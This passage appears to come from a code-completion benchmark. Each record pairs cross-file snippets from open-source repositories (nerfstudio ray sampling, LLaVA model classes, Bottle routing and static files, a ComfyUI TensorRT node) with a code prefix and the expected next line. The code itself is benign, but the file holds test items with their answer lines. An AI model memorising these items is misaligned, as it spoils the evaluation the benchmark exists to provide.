max_posts[0]\n return None\n\n def _get_post_with_min(self, score_attr):\n \"\"\"\n 获取具有最小属性值的文章\n :param score_attr:\n :return:\n \"\"\"\n min_score = min(getattr(post, score_attr) for post in self._my_blog.post_lists)\n min_posts = [post for post in self._my_blog.post_lists if getattr(post, score_attr) == min_score]\n if min_posts:\n return min_posts[0]\n return None"
}
] | from flask import Flask, render_template, redirect, url_for
from loguru import logger
from src import const
from src import models
from src import tools
from src.config import Config
from src.generator import Generator | 2,249 |
app = Flask(__name__)
logger.add("endofyear.log")
@app.route('/')
def home():
# 重定向 painting
return redirect(url_for('painting'))
@app.route('/painting')
def painting():
# 读取配置文件
config = Config("config.ini")
# 站点数据
|
app = Flask(__name__)
logger.add("endofyear.log")
@app.route('/')
def home():
# 重定向 painting
return redirect(url_for('painting'))
@app.route('/painting')
def painting():
# 读取配置文件
config = Config("config.ini")
# 站点数据 | site = models.Site( | 1 | 2023-10-30 03:07:17+00:00 | 4k |
masked-spacetime-hashing/msth | nerfstudio/model_components/ray_samplers.py | [
{
"identifier": "Frustums",
"path": "nerfstudio/cameras/rays.py",
"snippet": "class Frustums(TensorDataclass):\n \"\"\"Describes region of space as a frustum.\"\"\"\n\n origins: TensorType[\"bs\":..., 3]\n \"\"\"xyz coordinate for ray origin.\"\"\"\n directions: TensorType[\"bs\":..., 3]\n \"\"\"Direction of ray.\"\"\"\n starts: TensorType[\"bs\":..., 1]\n \"\"\"Where the frustum starts along a ray.\"\"\"\n ends: TensorType[\"bs\":..., 1]\n \"\"\"Where the frustum ends along a ray.\"\"\"\n pixel_area: TensorType[\"bs\":..., 1]\n \"\"\"Projected area of pixel a distance 1 away from origin.\"\"\"\n offsets: Optional[TensorType[\"bs\":..., 3]] = None\n \"\"\"Offsets for each sample position\"\"\"\n\n def get_positions(self) -> TensorType[..., 3]:\n \"\"\"Calculates \"center\" position of frustum. Not weighted by mass.\n\n Returns:\n xyz positions.\n \"\"\"\n pos = self.origins + self.directions * (self.starts + self.ends) / 2\n if self.offsets is not None:\n pos = pos + self.offsets\n return pos\n\n def set_offsets(self, offsets):\n \"\"\"Sets offsets for this frustum for computing positions\"\"\"\n self.offsets = offsets\n\n def get_gaussian_blob(self) -> Gaussians:\n \"\"\"Calculates guassian approximation of conical frustum.\n\n Returns:\n Conical frustums approximated by gaussian distribution.\n \"\"\"\n # Cone radius is set such that the square pixel_area matches the cone area.\n cone_radius = torch.sqrt(self.pixel_area) / 1.7724538509055159 # r = sqrt(pixel_area / pi)\n if self.offsets is not None:\n raise NotImplementedError()\n return conical_frustum_to_gaussian(\n origins=self.origins,\n directions=self.directions,\n starts=self.starts,\n ends=self.ends,\n radius=cone_radius,\n )\n\n @classmethod\n def get_mock_frustum(cls, device: Optional[TORCH_DEVICE] = \"cpu\") -> \"Frustums\":\n \"\"\"Helper function to generate a placeholder frustum.\n\n Returns:\n A size 1 frustum with meaningless values.\n \"\"\"\n return Frustums(\n origins=torch.ones((1, 3)).to(device),\n directions=torch.ones((1, 3)).to(device),\n starts=torch.ones((1, 1)).to(device),\n ends=torch.ones((1, 1)).to(device),\n pixel_area=torch.ones((1, 1)).to(device),\n )"
},
{
"identifier": "RayBundle",
"path": "nerfstudio/cameras/rays.py",
"snippet": "class RayBundle(TensorDataclass):\n \"\"\"A bundle of ray parameters.\"\"\"\n\n # TODO(ethan): make sure the sizes with ... are correct\n origins: TensorType[..., 3]\n \"\"\"Ray origins (XYZ)\"\"\"\n directions: TensorType[..., 3]\n \"\"\"Unit ray direction vector\"\"\"\n pixel_area: TensorType[..., 1]\n \"\"\"Projected area of pixel a distance 1 away from origin\"\"\"\n camera_indices: Optional[TensorType[..., 1]] = None\n \"\"\"Camera indices\"\"\"\n nears: Optional[TensorType[..., 1]] = None\n \"\"\"Distance along ray to start sampling\"\"\"\n fars: Optional[TensorType[..., 1]] = None\n \"\"\"Rays Distance along ray to stop sampling\"\"\"\n metadata: Optional[Dict[str, TensorType[\"num_rays\", \"latent_dims\"]]] = None\n \"\"\"Additional metadata or data needed for interpolation, will mimic shape of rays\"\"\"\n times: Optional[TensorType[..., 1]] = None\n \"\"\"Times at which rays are sampled\"\"\"\n\n def set_camera_indices(self, camera_index: int) -> None:\n \"\"\"Sets all of the the camera indices to a specific camera index.\n\n Args:\n camera_index: Camera index.\n \"\"\"\n self.camera_indices = torch.ones_like(self.origins[..., 0:1]).long() * camera_index\n\n def __len__(self) -> int:\n num_rays = torch.numel(self.origins) // self.origins.shape[-1]\n return num_rays\n\n def sample(self, num_rays: int) -> \"RayBundle\":\n \"\"\"Returns a RayBundle as a subset of rays.\n\n Args:\n num_rays: Number of rays in output RayBundle\n\n Returns:\n RayBundle with subset of rays.\n \"\"\"\n assert num_rays <= len(self)\n indices = random.sample(range(len(self)), k=num_rays)\n return self[indices]\n\n def get_row_major_sliced_ray_bundle(self, start_idx: int, end_idx: int) -> \"RayBundle\":\n \"\"\"Flattens RayBundle and extracts chunk given start and end indices.\n\n Args:\n start_idx: Start index of RayBundle chunk.\n end_idx: End index of RayBundle chunk.\n\n Returns:\n Flattened RayBundle with end_idx-start_idx rays.\n\n \"\"\"\n return self.flatten()[start_idx:end_idx]\n\n def get_ray_samples(\n self,\n bin_starts: TensorType[\"bs\":..., \"num_samples\", 1],\n bin_ends: TensorType[\"bs\":..., \"num_samples\", 1],\n spacing_starts: Optional[TensorType[\"bs\":..., \"num_samples\", 1]] = None,\n spacing_ends: Optional[TensorType[\"bs\":..., \"num_samples\", 1]] = None,\n spacing_to_euclidean_fn: Optional[Callable] = None,\n ) -> RaySamples:\n \"\"\"Produces samples for each ray by projection points along the ray direction. Currently samples uniformly.\n\n Args:\n bin_starts: Distance from origin to start of bin.\n bin_ends: Distance from origin to end of bin.\n\n Returns:\n Samples projected along ray.\n \"\"\"\n deltas = bin_ends - bin_starts\n if self.camera_indices is not None:\n camera_indices = self.camera_indices[..., None]\n else:\n camera_indices = None\n\n shaped_raybundle_fields = self[..., None]\n\n frustums = Frustums(\n origins=shaped_raybundle_fields.origins, # [..., 1, 3]\n directions=shaped_raybundle_fields.directions, # [..., 1, 3]\n starts=bin_starts, # [..., num_samples, 1]\n ends=bin_ends, # [..., num_samples, 1]\n pixel_area=shaped_raybundle_fields.pixel_area, # [..., 1, 1]\n )\n\n ray_samples = RaySamples(\n frustums=frustums,\n camera_indices=camera_indices, # [..., 1, 1]\n deltas=deltas, # [..., num_samples, 1]\n spacing_starts=spacing_starts, # [..., num_samples, 1]\n spacing_ends=spacing_ends, # [..., num_samples, 1]\n spacing_to_euclidean_fn=spacing_to_euclidean_fn,\n metadata=shaped_raybundle_fields.metadata,\n times=None if self.times is None else self.times[..., None], # [..., 1, 1]\n )\n\n return ray_samples"
},
{
"identifier": "RaySamples",
"path": "nerfstudio/cameras/rays.py",
"snippet": "class RaySamples(TensorDataclass):\n \"\"\"Samples along a ray\"\"\"\n\n frustums: Frustums\n \"\"\"Frustums along ray.\"\"\"\n camera_indices: Optional[TensorType[\"bs\":..., 1]] = None\n \"\"\"Camera index.\"\"\"\n deltas: Optional[TensorType[\"bs\":..., 1]] = None\n \"\"\"\"width\" of each sample.\"\"\"\n spacing_starts: Optional[TensorType[\"bs\":..., \"num_samples\", 1]] = None\n \"\"\"Start of normalized bin edges along ray [0,1], before warping is applied, ie. linear in disparity sampling.\"\"\"\n spacing_ends: Optional[TensorType[\"bs\":..., \"num_samples\", 1]] = None\n \"\"\"Start of normalized bin edges along ray [0,1], before warping is applied, ie. linear in disparity sampling.\"\"\"\n spacing_to_euclidean_fn: Optional[Callable] = None\n \"\"\"Function to convert bins to euclidean distance.\"\"\"\n metadata: Optional[Dict[str, TensorType[\"bs\":..., \"latent_dims\"]]] = None\n \"\"\"additional information relevant to generating ray samples\"\"\"\n\n times: Optional[TensorType[..., 1]] = None\n \"\"\"Times at which rays are sampled\"\"\"\n\n def get_transmittance(self, densities: TensorType[..., \"num_samples\", 1]) -> TensorType[..., \"num_samples\", 1]:\n \"\"\"Return weights based on predicted densities\n\n Args:\n densities: Predicted densities for samples along ray\n\n Returns:\n Weights for each sample\n \"\"\"\n\n delta_density = self.deltas * densities\n alphas = 1 - torch.exp(-delta_density)\n\n transmittance = torch.cumsum(delta_density[..., :-1, :], dim=-2)\n transmittance = torch.cat(\n [torch.zeros((*transmittance.shape[:1], 1, 1), device=densities.device), transmittance], dim=-2\n )\n transmittance = torch.exp(-transmittance) # [..., \"num_samples\"]\n transmittance = torch.nan_to_num(transmittance)\n\n return transmittance\n\n def get_weights(self, densities: TensorType[..., \"num_samples\", 1]) -> TensorType[..., \"num_samples\", 1]:\n \"\"\"Return weights based on predicted densities\n\n Args:\n densities: Predicted densities for samples along ray\n\n Returns:\n Weights for each sample\n \"\"\"\n\n delta_density = self.deltas * densities\n alphas = 1 - torch.exp(-delta_density)\n\n transmittance = torch.cumsum(delta_density[..., :-1, :], dim=-2)\n transmittance = torch.cat(\n [torch.zeros((*transmittance.shape[:1], 1, 1), device=densities.device), transmittance], dim=-2\n )\n transmittance = torch.exp(-transmittance) # [..., \"num_samples\"]\n\n weights = alphas * transmittance # [..., \"num_samples\"]\n weights = torch.nan_to_num(weights)\n\n return weights"
}
] | from abc import abstractmethod
from typing import Callable, List, Optional, Tuple
from nerfacc import OccupancyGrid
from torch import nn
from torchtyping import TensorType
from nerfstudio.cameras.rays import Frustums, RayBundle, RaySamples
import nerfacc
import torch | 2,751 | # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collection of sampling strategies
"""
class Sampler(nn.Module):
"""Generate Samples
Args:
num_samples: number of samples to take
"""
def __init__(
self,
num_samples: Optional[int] = None,
) -> None:
super().__init__()
self.num_samples = num_samples
@abstractmethod
| # Copyright 2022 The Nerfstudio Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collection of sampling strategies
"""
class Sampler(nn.Module):
"""Generate Samples
Args:
num_samples: number of samples to take
"""
def __init__(
self,
num_samples: Optional[int] = None,
) -> None:
super().__init__()
self.num_samples = num_samples
@abstractmethod | def generate_ray_samples(self) -> RaySamples: | 2 | 2023-10-26 04:39:15+00:00 | 4k |
sehyunkwon/ICTC | step1/llava/model/language_model/llava_llama.py | [
{
"identifier": "LlavaMetaModel",
"path": "step1/llava/model/llava_arch.py",
"snippet": "class LlavaMetaModel:\n\n def __init__(self, config):\n super(LlavaMetaModel, self).__init__(config)\n\n if hasattr(config, \"mm_vision_tower\"):\n self.vision_tower = build_vision_tower(config, delay_load=True)\n self.mm_projector = nn.Linear(config.mm_hidden_size, config.hidden_size)\n\n def get_vision_tower(self):\n vision_tower = getattr(self, 'vision_tower', None)\n if type(vision_tower) is list:\n vision_tower = vision_tower[0]\n return vision_tower\n\n def initialize_vision_modules(self, model_args, fsdp=None):\n vision_tower = model_args.vision_tower\n mm_vision_select_layer = model_args.mm_vision_select_layer\n mm_vision_select_feature = model_args.mm_vision_select_feature\n pretrain_mm_mlp_adapter = model_args.pretrain_mm_mlp_adapter\n\n self.config.mm_vision_tower = vision_tower\n\n vision_tower = build_vision_tower(model_args)\n\n if fsdp is not None and len(fsdp) > 0:\n self.vision_tower = [vision_tower]\n else:\n self.vision_tower = vision_tower\n\n self.config.use_mm_proj = True\n self.config.mm_hidden_size = vision_tower.hidden_size\n self.config.mm_vision_select_layer = mm_vision_select_layer\n self.config.mm_vision_select_feature = mm_vision_select_feature\n\n if not hasattr(self, 'mm_projector'):\n self.mm_projector = nn.Linear(self.config.mm_hidden_size, self.config.hidden_size)\n\n if pretrain_mm_mlp_adapter is not None:\n mm_projector_weights = torch.load(pretrain_mm_mlp_adapter, map_location='cpu')\n def get_w(weights, keyword):\n return {k.split(keyword + '.')[1]: v for k, v in weights.items() if keyword in k}\n\n self.mm_projector.load_state_dict(get_w(mm_projector_weights, 'mm_projector'))"
},
{
"identifier": "LlavaMetaForCausalLM",
"path": "step1/llava/model/llava_arch.py",
"snippet": "class LlavaMetaForCausalLM(ABC):\n\n @abstractmethod\n def get_model(self):\n pass\n\n def get_vision_tower(self):\n return self.get_model().get_vision_tower()\n\n def encode_images(self, images):\n image_features = self.get_model().get_vision_tower()(images)\n image_features = self.get_model().mm_projector(image_features)\n return image_features\n\n def prepare_inputs_labels_for_multimodal(\n self, input_ids, attention_mask, past_key_values, labels, images\n ):\n vision_tower = self.get_vision_tower()\n if vision_tower is None or images is None or input_ids.shape[1] == 1:\n if past_key_values is not None and vision_tower is not None and images is not None and input_ids.shape[1] == 1:\n attention_mask = torch.ones((attention_mask.shape[0], past_key_values[-1][-1].shape[-2] + 1), dtype=attention_mask.dtype, device=attention_mask.device)\n return input_ids, attention_mask, past_key_values, None, labels\n\n if type(images) is list or images.ndim == 5:\n concat_images = torch.cat([image for image in images], dim=0)\n image_features = self.encode_images(concat_images)\n split_sizes = [image.shape[0] for image in images]\n image_features = torch.split(image_features, split_sizes, dim=0)\n image_features = [x.flatten(0, 1) for x in image_features]\n else:\n image_features = self.encode_images(images)\n\n new_input_embeds = []\n new_labels = [] if labels is not None else None\n cur_image_idx = 0\n for batch_idx, cur_input_ids in enumerate(input_ids):\n if (cur_input_ids == IMAGE_TOKEN_INDEX).sum() == 0:\n # multimodal LLM, but the current sample is not multimodal\n cur_input_embeds = self.get_model().embed_tokens(cur_input_ids)\n cur_input_embeds = cur_input_embeds + (0. * self.get_model().mm_projector(vision_tower.dummy_feature)).sum()\n new_input_embeds.append(cur_input_embeds)\n if labels is not None:\n new_labels.append(labels[batch_idx])\n cur_image_idx += 1\n continue\n image_token_indices = torch.where(cur_input_ids == IMAGE_TOKEN_INDEX)[0]\n cur_new_input_embeds = []\n if labels is not None:\n cur_labels = labels[batch_idx]\n cur_new_labels = []\n assert cur_labels.shape == cur_input_ids.shape\n while image_token_indices.numel() > 0:\n cur_image_features = image_features[cur_image_idx]\n image_token_start = image_token_indices[0]\n if getattr(self.config, 'tune_mm_mlp_adapter', False) and getattr(self.config, 'mm_use_im_start_end', False):\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids[:image_token_start-1]).detach())\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids[image_token_start-1:image_token_start]))\n cur_new_input_embeds.append(cur_image_features)\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids[image_token_start+1:image_token_start+2]))\n if labels is not None:\n cur_new_labels.append(cur_labels[:image_token_start])\n cur_new_labels.append(torch.full((cur_image_features.shape[0],), IGNORE_INDEX, device=labels.device, dtype=labels.dtype))\n cur_new_labels.append(cur_labels[image_token_start:image_token_start+1])\n cur_labels = cur_labels[image_token_start+2:]\n else:\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids[:image_token_start]))\n cur_new_input_embeds.append(cur_image_features)\n if labels is not None:\n cur_new_labels.append(cur_labels[:image_token_start])\n cur_new_labels.append(torch.full((cur_image_features.shape[0],), IGNORE_INDEX, device=labels.device, dtype=labels.dtype))\n cur_labels = cur_labels[image_token_start+1:]\n cur_image_idx += 1\n if getattr(self.config, 'tune_mm_mlp_adapter', False) and getattr(self.config, 'mm_use_im_start_end', False):\n cur_input_ids = cur_input_ids[image_token_start+2:]\n else:\n cur_input_ids = cur_input_ids[image_token_start+1:]\n image_token_indices = torch.where(cur_input_ids == IMAGE_TOKEN_INDEX)[0]\n if cur_input_ids.numel() > 0:\n if getattr(self.config, 'tune_mm_mlp_adapter', False) and getattr(self.config, 'mm_use_im_start_end', False):\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids).detach())\n else:\n cur_new_input_embeds.append(self.get_model().embed_tokens(cur_input_ids))\n if labels is not None:\n cur_new_labels.append(cur_labels)\n cur_new_input_embeds = [x.to(device=self.device) for x in cur_new_input_embeds]\n cur_new_input_embeds = torch.cat(cur_new_input_embeds, dim=0)\n new_input_embeds.append(cur_new_input_embeds)\n if labels is not None:\n cur_new_labels = torch.cat(cur_new_labels, dim=0)\n new_labels.append(cur_new_labels)\n\n if any(x.shape != new_input_embeds[0].shape for x in new_input_embeds):\n max_len = max(x.shape[0] for x in new_input_embeds)\n\n new_input_embeds_align = []\n for cur_new_embed in new_input_embeds:\n cur_new_embed = torch.cat((cur_new_embed, torch.zeros((max_len - cur_new_embed.shape[0], cur_new_embed.shape[1]), dtype=cur_new_embed.dtype, device=cur_new_embed.device)), dim=0)\n new_input_embeds_align.append(cur_new_embed)\n new_input_embeds = torch.stack(new_input_embeds_align, dim=0)\n\n if labels is not None:\n new_labels_align = []\n _new_labels = new_labels\n for cur_new_label in new_labels:\n cur_new_label = torch.cat((cur_new_label, torch.full((max_len - cur_new_label.shape[0],), IGNORE_INDEX, dtype=cur_new_label.dtype, device=cur_new_label.device)), dim=0)\n new_labels_align.append(cur_new_label)\n new_labels = torch.stack(new_labels_align, dim=0)\n\n if attention_mask is not None:\n new_attention_mask = []\n for cur_attention_mask, cur_new_labels, cur_new_labels_align in zip(attention_mask, _new_labels, new_labels):\n new_attn_mask_pad_left = torch.full((cur_new_labels.shape[0] - labels.shape[1],), True, dtype=attention_mask.dtype, device=attention_mask.device)\n new_attn_mask_pad_right = torch.full((cur_new_labels_align.shape[0] - cur_new_labels.shape[0],), False, dtype=attention_mask.dtype, device=attention_mask.device)\n cur_new_attention_mask = torch.cat((new_attn_mask_pad_left, cur_attention_mask, new_attn_mask_pad_right), dim=0)\n new_attention_mask.append(cur_new_attention_mask)\n attention_mask = torch.stack(new_attention_mask, dim=0)\n assert attention_mask.shape == new_labels.shape\n else:\n new_input_embeds = torch.stack(new_input_embeds, dim=0)\n if labels is not None:\n new_labels = torch.stack(new_labels, dim=0)\n\n if attention_mask is not None:\n new_attn_mask_pad_left = torch.full((attention_mask.shape[0], new_input_embeds.shape[1] - input_ids.shape[1]), True, dtype=attention_mask.dtype, device=attention_mask.device)\n attention_mask = torch.cat((new_attn_mask_pad_left, attention_mask), dim=1)\n assert attention_mask.shape == new_input_embeds.shape[:2]\n\n return None, attention_mask, past_key_values, new_input_embeds, new_labels\n\n def initialize_vision_tokenizer(self, model_args, tokenizer):\n if model_args.mm_use_im_patch_token:\n tokenizer.add_tokens([DEFAULT_IMAGE_PATCH_TOKEN], special_tokens=True)\n self.resize_token_embeddings(len(tokenizer))\n\n if model_args.mm_use_im_start_end:\n num_new_tokens = tokenizer.add_tokens([DEFAULT_IM_START_TOKEN, DEFAULT_IM_END_TOKEN], special_tokens=True)\n self.resize_token_embeddings(len(tokenizer))\n\n if num_new_tokens > 0:\n input_embeddings = self.get_input_embeddings().weight.data\n output_embeddings = self.get_output_embeddings().weight.data\n\n input_embeddings_avg = input_embeddings[:-num_new_tokens].mean(\n dim=0, keepdim=True)\n output_embeddings_avg = output_embeddings[:-num_new_tokens].mean(\n dim=0, keepdim=True)\n\n input_embeddings[-num_new_tokens:] = input_embeddings_avg\n output_embeddings[-num_new_tokens:] = output_embeddings_avg\n\n if model_args.tune_mm_mlp_adapter:\n for p in self.get_input_embeddings().parameters():\n p.requires_grad = True\n for p in self.get_output_embeddings().parameters():\n p.requires_grad = False\n\n if model_args.pretrain_mm_mlp_adapter:\n mm_projector_weights = torch.load(model_args.pretrain_mm_mlp_adapter, map_location='cpu')\n embed_tokens_weight = mm_projector_weights['model.embed_tokens.weight']\n assert num_new_tokens == 2\n if input_embeddings.shape == embed_tokens_weight.shape:\n input_embeddings[-num_new_tokens:] = embed_tokens_weight[-num_new_tokens:]\n elif embed_tokens_weight.shape[0] == num_new_tokens:\n input_embeddings[-num_new_tokens:] = embed_tokens_weight\n else:\n raise ValueError(f\"Unexpected embed_tokens_weight shape. Pretrained: {embed_tokens_weight.shape}. Current: {input_embeddings.shape}. Numer of new tokens: {num_new_tokens}.\")\n elif model_args.mm_use_im_patch_token:\n if model_args.tune_mm_mlp_adapter:\n for p in self.get_input_embeddings().parameters():\n p.requires_grad = False\n for p in self.get_output_embeddings().parameters():\n p.requires_grad = False"
}
] | from typing import List, Optional, Tuple, Union
from torch.nn import CrossEntropyLoss
from transformers import AutoConfig, AutoModelForCausalLM, \
LlamaConfig, LlamaModel, LlamaForCausalLM
from transformers.modeling_outputs import CausalLMOutputWithPast
from ..llava_arch import LlavaMetaModel, LlavaMetaForCausalLM
import torch
import torch.nn as nn | 3,209 | # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaConfig(LlamaConfig):
model_type = "llava"
class LlavaLlamaModel(LlavaMetaModel, LlamaModel):
config_class = LlavaConfig
def __init__(self, config: LlamaConfig):
super(LlavaLlamaModel, self).__init__(config)
| # Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaConfig(LlamaConfig):
model_type = "llava"
class LlavaLlamaModel(LlavaMetaModel, LlamaModel):
config_class = LlavaConfig
def __init__(self, config: LlamaConfig):
super(LlavaLlamaModel, self).__init__(config)
| class LlavaLlamaForCausalLM(LlamaForCausalLM, LlavaMetaForCausalLM): | 1 | 2023-10-27 05:00:14+00:00 | 4k |
jgujerry/pythonframeworks | frameworks.py | [
{
"identifier": "route",
"path": "bottle.py",
"snippet": "def route(self, path=None, method='GET', callback=None, name=None,\n apply=None, skip=None, **config):\n \"\"\" A decorator to bind a function to a request URL. Example::\n\n @app.route('/hello/:name')\n def hello(name):\n return 'Hello %s' % name\n\n The ``:name`` part is a wildcard. See :class:`Router` for syntax\n details.\n\n :param path: Request path or a list of paths to listen to. If no\n path is specified, it is automatically generated from the\n signature of the function.\n :param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of\n methods to listen to. (default: `GET`)\n :param callback: An optional shortcut to avoid the decorator\n syntax. ``route(..., callback=func)`` equals ``route(...)(func)``\n :param name: The name for this route. (default: None)\n :param apply: A decorator or plugin or a list of plugins. These are\n applied to the route callback in addition to installed plugins.\n :param skip: A list of plugins, plugin classes or names. Matching\n plugins are not installed to this route. ``True`` skips all.\n\n Any additional keyword arguments are stored as route-specific\n configuration and passed to plugins (see :meth:`Plugin.apply`).\n \"\"\"\n if callable(path): path, callback = None, path\n plugins = makelist(apply)\n skiplist = makelist(skip)\n def decorator(callback):\n # TODO: Documentation and tests\n if isinstance(callback, basestring): callback = load(callback)\n for rule in makelist(path) or yieldroutes(callback):\n for verb in makelist(method):\n verb = verb.upper()\n route = Route(self, rule, verb, callback, name=name,\n plugins=plugins, skiplist=skiplist, **config)\n self.add_route(route)\n return callback\n return decorator(callback) if callback else decorator"
},
{
"identifier": "run",
"path": "bottle.py",
"snippet": "def run(self, **kwargs):\n ''' Calls :func:`run` with the same parameters. '''\n run(self, **kwargs)"
},
{
"identifier": "template",
"path": "bottle.py",
"snippet": "def template(*args, **kwargs):\n '''\n Get a rendered template as a string iterator.\n You can use a name, a filename or a template string as first parameter.\n Template rendering arguments can be passed as dictionaries\n or directly (as keyword arguments).\n '''\n tpl = args[0] if args else None\n adapter = kwargs.pop('template_adapter', SimpleTemplate)\n lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)\n tplid = (id(lookup), tpl)\n if tplid not in TEMPLATES or DEBUG:\n settings = kwargs.pop('template_settings', {})\n if isinstance(tpl, adapter):\n TEMPLATES[tplid] = tpl\n if settings: TEMPLATES[tplid].prepare(**settings)\n elif \"\\n\" in tpl or \"{\" in tpl or \"%\" in tpl or '$' in tpl:\n TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)\n else:\n TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)\n if not TEMPLATES[tplid]:\n abort(500, 'Template (%s) not found' % tpl)\n for dictarg in args[1:]: kwargs.update(dictarg)\n return TEMPLATES[tplid].render(kwargs)"
},
{
"identifier": "static_file",
"path": "bottle.py",
"snippet": "def static_file(filename, root, mimetype='auto', download=False, charset='UTF-8'):\n \"\"\" Open a file in a safe way and return :exc:`HTTPResponse` with status\n code 200, 305, 403 or 404. The ``Content-Type``, ``Content-Encoding``,\n ``Content-Length`` and ``Last-Modified`` headers are set if possible.\n Special support for ``If-Modified-Since``, ``Range`` and ``HEAD``\n requests.\n\n :param filename: Name or path of the file to send.\n :param root: Root path for file lookups. Should be an absolute directory\n path.\n :param mimetype: Defines the content-type header (default: guess from\n file extension)\n :param download: If True, ask the browser to open a `Save as...` dialog\n instead of opening the file with the associated program. You can\n specify a custom filename as a string. If not specified, the\n original filename is used (default: False).\n :param charset: The charset to use for files with a ``text/*``\n mime-type. (default: UTF-8)\n \"\"\"\n\n root = os.path.abspath(root) + os.sep\n filename = os.path.abspath(os.path.join(root, filename.strip('/\\\\')))\n headers = dict()\n\n if not filename.startswith(root):\n return HTTPError(403, \"Access denied.\")\n if not os.path.exists(filename) or not os.path.isfile(filename):\n return HTTPError(404, \"File does not exist.\")\n if not os.access(filename, os.R_OK):\n return HTTPError(403, \"You do not have permission to access this file.\")\n\n if mimetype == 'auto':\n mimetype, encoding = mimetypes.guess_type(filename)\n if encoding: headers['Content-Encoding'] = encoding\n\n if mimetype:\n if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype:\n mimetype += '; charset=%s' % charset\n headers['Content-Type'] = mimetype\n\n if download:\n download = os.path.basename(filename if download == True else download)\n headers['Content-Disposition'] = 'attachment; filename=\"%s\"' % download\n\n stats = os.stat(filename)\n headers['Content-Length'] = clen = stats.st_size\n lm = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", time.gmtime(stats.st_mtime))\n headers['Last-Modified'] = lm\n\n ims = request.environ.get('HTTP_IF_MODIFIED_SINCE')\n if ims:\n ims = parse_date(ims.split(\";\")[0].strip())\n if ims is not None and ims >= int(stats.st_mtime):\n headers['Date'] = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", time.gmtime())\n return HTTPResponse(status=304, **headers)\n\n body = '' if request.method == 'HEAD' else open(filename, 'rb')\n\n headers[\"Accept-Ranges\"] = \"bytes\"\n ranges = request.environ.get('HTTP_RANGE')\n if 'HTTP_RANGE' in request.environ:\n ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen))\n if not ranges:\n return HTTPError(416, \"Requested Range Not Satisfiable\")\n offset, end = ranges[0]\n headers[\"Content-Range\"] = \"bytes %d-%d/%d\" % (offset, end-1, clen)\n headers[\"Content-Length\"] = str(end-offset)\n if body: body = _file_iter_range(body, offset, end-offset)\n return HTTPResponse(body, status=206, **headers)\n return HTTPResponse(body, **headers)"
}
] | from bottle import route, run, template, static_file | 1,739 |
@route("/")
def index():
return template("index.html")
@route("/static/<filename:path>")
def static(filename):
|
@route("/")
def index():
return template("index.html")
@route("/static/<filename:path>")
def static(filename): | return static_file(filename, root="static") | 3 | 2023-10-29 12:19:46+00:00 | 4k |
phineas-pta/comfy-trt-test | comfy_trt/node_unet.py | [
{
"identifier": "TRT_MODEL_DIR",
"path": "comfy_trt/model_manager.py",
"snippet": "BASE_PATH = os.path.dirname(os.path.realpath(__file__))\nONNX_MODEL_DIR = os.path.join(BASE_PATH, \"Unet-onnx\")\nTRT_MODEL_DIR = os.path.join(BASE_PATH, \"Unet-trt\")\nMODEL_FILE = os.path.join(TRT_MODEL_DIR, \"model.json\")\ndef get_cc() -> tuple[int]:\n\tdef __init__(self, model_file: str = MODEL_FILE):\n\tdef get_onnx_path(model_name: str) -> tuple[str]:\n\tdef get_trt_path(self, model_name: str, profile: dict, static_shape: bool) -> tuple[str]:\n\tdef get_weights_map_path(self, model_name: str):\n\tdef update(self) -> None:\n\tdef add_entry(\n\t\tself,\n\t\tmodel_name: str,\n\t\tprofile: dict,\n\t\tstatic_shapes: bool,\n\t\tfp32: bool,\n\t\tbaseline_model: str,\n\t\tprediction_type: str,\n\t\tinpaint: bool,\n\t\trefit: bool,\n\t\tunet_hidden_dim: int,\n\t\tlora: bool\n\t) -> None:\n\tdef add_lora_entry(\n\t\tself,\n\t\tbase_model: str,\n\t\tlora_name: str,\n\t\ttrt_lora_path: str,\n\t\tfp32: bool,\n\t\tbaseline_model: str,\n\t\tprediction_type: str,\n\t\tinpaint: bool,\n\t\tunet_hidden_dim: int\n\t) -> None:\n\tdef write_json(self) -> None:\n\tdef read_json(self, encode_config: bool = True) -> dict:\n\tdef available_models(self) -> dict:\n\tdef available_loras(self):\n\tdef get_timing_cache(self) -> str:\n\tdef get_valid_models_from_dict(self, base_model: str, feed_dict: dict) -> tuple[list[bool], list[float]]:\n\tdef get_valid_models(self, base_model: str, 